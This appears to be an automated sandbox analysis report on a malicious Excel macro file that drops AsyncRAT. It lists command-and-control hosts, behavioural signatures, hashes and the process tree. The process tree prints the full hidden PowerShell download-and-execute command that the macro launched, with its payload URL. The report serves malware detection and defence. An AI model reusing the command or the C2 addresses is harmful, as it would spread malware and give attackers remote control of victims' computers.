Analysis

  • max time kernel
    135s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-03-2023 02:56

General

  • Target

    ORDER-230316.xlsm

  • Size

    41KB

  • MD5

    91b915d7c1079e51e241748a006da03c

  • SHA1

    846a9d44011340ebc31439f316efc2d1e5b279a6

  • SHA256

    7508dd55323850161d037626592fc56eb6be4cc917c68ba90f3c5866f5c2b59d

  • SHA512

    e40c725e1ca805ea9613e6f8f77f1119337e5bda49b6f5cd1f3cd7aa9f4f4da2aa744ec86cc6c5d7f264173390148ba07cc7968c22d340aceea31df5d3bf54c2

  • SSDEEP

    768:iATtXvQ04qta8v+nWE8hMBIJYfTH+niSplFFiKk/fsgvRag+neWM:VxvSqJv+xG1BjFFi3/Egvg/e9

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

LATEST

C2

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:49746

chongmei33.publicvm.com:6974

chonglee575.duckdns.org:2703

chonglee575.duckdns.org:49746

chonglee575.duckdns.org:6974

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_file

    update.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER-230316.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://2m-store.com/megaa-store.com/public/wp.exe" -OutFile $TempFile; Start-Process $TempFile;
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2260
      • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
        "C:\Users\Admin\AppData\Local\Temp\tmpC25.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ipconfig /release
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3784
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /release
            5⤵
            • Gathers network information
            PID:4716
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c ipconfig /renew
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2932
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /renew
            5⤵
            • Gathers network information
            PID:2656
        • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          4⤵
          • Executes dropped EXE
          PID:4164
        • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          4⤵
          • Executes dropped EXE
          PID:4388
        • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          4⤵
          • Executes dropped EXE
          PID:60
        • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:340

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Command-Line Interface

1
T1059

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

5
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmpC25.exe.log
    Filesize

    1KB

    MD5

    7e88081fcf716d85992bb3af3d9b6454

    SHA1

    2153780fbc71061b0102a7a7b665349e1013e250

    SHA256

    5ffb4a3ea94a6a53c4f88e2191c6fec5fd8a7336e367aa113fe8c12631e0c4d2

    SHA512

    ec606e14367ae221c04f213a61a6f797034495121198e4788e3afa4aa8db67bf59c5c5210a56afae5557158e8923b013b371b84c7d64303618c5b4c57a2224f7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gr3vqvof.vu3.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • C:\Users\Admin\AppData\Local\Temp\tmpC25.exe
    Filesize

    2.8MB

    MD5

    604352a51c64f59c25a04991f42a4418

    SHA1

    29d4fafa442693ae60f92816aa7f55e3a215fd3c

    SHA256

    43639284cc83ca4b36e9996c616e4dae98fe4e49b2878bb0d4fc07d3fd8ed0ff

    SHA512

    e51cf68cdee9242996f0b7d7d11d812e27b30fc8f7628aff4c066251c41d18144692be2bfd6a45cfb50ef4d70f3e6e1e2e5a53dc5af0af6f5065d9bf14d7a96c

  • memory/340-201-0x00000000062D0000-0x0000000006874000-memory.dmp
    Filesize

    5.6MB

  • memory/340-190-0x0000000000400000-0x0000000000412000-memory.dmp
    Filesize

    72KB

  • memory/340-195-0x00000000053B0000-0x00000000053C0000-memory.dmp
    Filesize

    64KB

  • memory/340-198-0x00000000053B0000-0x00000000053C0000-memory.dmp
    Filesize

    64KB

  • memory/340-202-0x0000000005D90000-0x0000000005DF6000-memory.dmp
    Filesize

    408KB

  • memory/340-200-0x0000000005C80000-0x0000000005D1C000-memory.dmp
    Filesize

    624KB

  • memory/1804-215-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-133-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-135-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-136-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-138-0x00007FF932AD0000-0x00007FF932AE0000-memory.dmp
    Filesize

    64KB

  • memory/1804-214-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-216-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-217-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-137-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-134-0x00007FF935270000-0x00007FF935280000-memory.dmp
    Filesize

    64KB

  • memory/1804-139-0x00007FF932AD0000-0x00007FF932AE0000-memory.dmp
    Filesize

    64KB

  • memory/2260-168-0x00000156DB3D0000-0x00000156DB3E0000-memory.dmp
    Filesize

    64KB

  • memory/2260-169-0x00000156DB3D0000-0x00000156DB3E0000-memory.dmp
    Filesize

    64KB

  • memory/2260-167-0x00000156DB3D0000-0x00000156DB3E0000-memory.dmp
    Filesize

    64KB

  • memory/2260-159-0x00000156DB3D0000-0x00000156DB3E0000-memory.dmp
    Filesize

    64KB

  • memory/2260-158-0x00000156DB3D0000-0x00000156DB3E0000-memory.dmp
    Filesize

    64KB

  • memory/2260-157-0x00000156C31E0000-0x00000156C3202000-memory.dmp
    Filesize

    136KB

  • memory/4856-186-0x0000000005E90000-0x0000000005EB2000-memory.dmp
    Filesize

    136KB

  • memory/4856-185-0x0000000005C00000-0x0000000005C10000-memory.dmp
    Filesize

    64KB

  • memory/4856-184-0x0000000000EB0000-0x0000000001182000-memory.dmp
    Filesize

    2.8MB